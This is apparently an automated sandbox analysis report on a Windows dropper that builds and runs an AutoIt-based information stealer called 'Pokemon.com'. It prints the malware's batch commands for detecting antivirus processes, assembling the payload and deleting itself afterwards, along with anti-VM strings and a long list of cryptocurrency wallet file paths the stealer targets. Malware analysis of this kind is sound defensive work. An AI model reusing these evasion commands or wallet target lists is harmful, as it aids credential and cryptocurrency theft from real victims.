                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: JA7cOAGHym.exeStatic file information: File size 1199374 > 1048576
                Source: JA7cOAGHym.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: JA7cOAGHym.exeStatic PE information: real checksum: 0x12d2d3 should be: 0x128a0e
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000E02DB push cs; retn 000Dh12_2_000E0318
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0DE6 push ecx; ret 12_2_000B0DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comJump to dropped file

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_001226DD
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_000AFC7C
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103124
                Source: Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 3748Thread sleep count: 88 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FDC54
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A087
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A1E2
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_000FE472
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0010A570
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CC622 FindFirstFileExW,12_2_000CC622
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001066DC FindFirstFileW,FindNextFileW,FindClose,12_2_001066DC
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00107333 FindFirstFileW,FindClose,12_2_00107333
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001073D4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FD921
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00095FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00095FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: chrome.exe, 00000010.00000002.2707863936.00007C1C006CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: chrome.exe, 00000010.00000002.2705390759.00007C1C00290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0950f909-eab1-4d51-88f9-7d20c3570a49
                Source: Web Data.22.drBinary or memory string: discord.comVMware20,11696428655f
                Source: Web Data.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: global block list test formVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: chrome.exe, 00000010.00000002.2700251068.000001395ACB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_`
                Source: Pokemon.com, 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074168906.0000000003FDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000014.00000003.2769810750.00005C8400384000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Web Data.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Web Data.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Web Data.22.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Web Data.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: msedge.exe, 00000014.00000002.2837803819.0000026FEF844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Web Data.22.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: chrome.exe, 00000010.00000002.2699532957.000001395710C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                Source: Web Data.22.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Web Data.22.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Web Data.22.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Web Data.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Web Data.22.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Web Data.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Web Data.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010F4FF BlockInput,12_2_0010F4FF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0009338B
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B5058 mov eax, dword ptr fs:[00000030h]12_2_000B5058
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_000F20AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000C2992
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000B0BAF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0D45 SetUnhandledExceptionFilter,12_2_000B0D45
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_000B0F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_000F1B4D
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0009338B
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FBBED SendInput,keybd_event,12_2_000FBBED
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FEC6C mouse_event,12_2_000FEC6C
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ValidationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAO" Offering Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Pokemon.com yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_000F14AE
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_000F1FB0
                Source: Pokemon.com, 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp, Investigator.9.dr, Pokemon.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Pokemon.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0A08 cpuid 12_2_000B0A08
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000EE5F4 GetLocalTime,12_2_000EE5F4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000EE652 GetUserNameW,12_2_000EE652
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_000CBCD2
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet 